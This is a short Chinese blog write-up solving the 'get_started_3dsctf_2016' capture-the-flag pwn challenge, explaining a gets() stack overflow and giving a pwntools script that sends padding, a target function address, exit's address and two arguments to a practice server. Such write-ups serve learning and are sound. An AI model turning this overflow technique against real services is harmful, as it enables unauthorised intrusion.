get_started_3dsctf_2016

  • 开发
  • 20

 checksec

没有栈保护,应该还是栈溢出

一般是先在main函数查找,看看整体逻辑

找到了get漏洞

注意啊注意!

这里这道题没有缓冲区

这是正常的题,这里有个s 

但是这道题!

只有R没有s

这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题

from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()

阅读全部

相关推荐

  4. SDK version 2018.3 doesnt match hw_server version 2015.2

    2024-07-13 00:22:01       19 阅读

  5. DASCTF2024暑期挑战赛

    2024-07-13 00:22:01       20 阅读

  8. vs2019+qt+opencv+open3d

    2024-07-13 00:22:01       50 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-13 00:22:01       66 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-13 00:22:01       70 阅读

  9. 在Django里面运行非项目文件

    2024-07-13 00:22:01       57 阅读

  19. Python语言-面向对象

    2024-07-13 00:22:01       68 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-13 00:22:01       62 阅读

热门阅读

  3. 【c++刷题笔记-动态规划】day36:1049. 最后一块石头的重量 II 、 494. 目标和 、 474.一和零

    2024-07-13 00:22:01       17 阅读

  7. Unity3D中UI层级改变详解

    2024-07-13 00:22:01       24 阅读

  9. 【Soc级系统防御】PCB安全威胁与防御策略:攻击模型与实践指南

    2024-07-13 00:22:01       22 阅读

  12. Gunicorn多进程指南:让Web应用跑得更快

    2024-07-13 00:22:01       21 阅读

  13. 深入探索Vite的热更新(HMR)实现

    2024-07-13 00:22:01       23 阅读

  15. springboot中抽离日志

    2024-07-13 00:22:01       18 阅读

  17. 《C++并发编程实战》笔记(一、二)

    2024-07-13 00:22:01       20 阅读

  18. 极速目标检测:算法加速的策略与实践

    2024-07-13 00:22:01       18 阅读

  19. hnust 2184: huffman编码(1)

    2024-07-13 00:22:01       23 阅读

  23. Python爬虫教程第6篇-使用session发起请求

    2024-07-13 00:22:01       19 阅读

  25. uniapp js 用dom创建form表单 并提交

    2024-07-13 00:22:01       19 阅读

  27. android 固定图片大小

    2024-07-13 00:22:01       19 阅读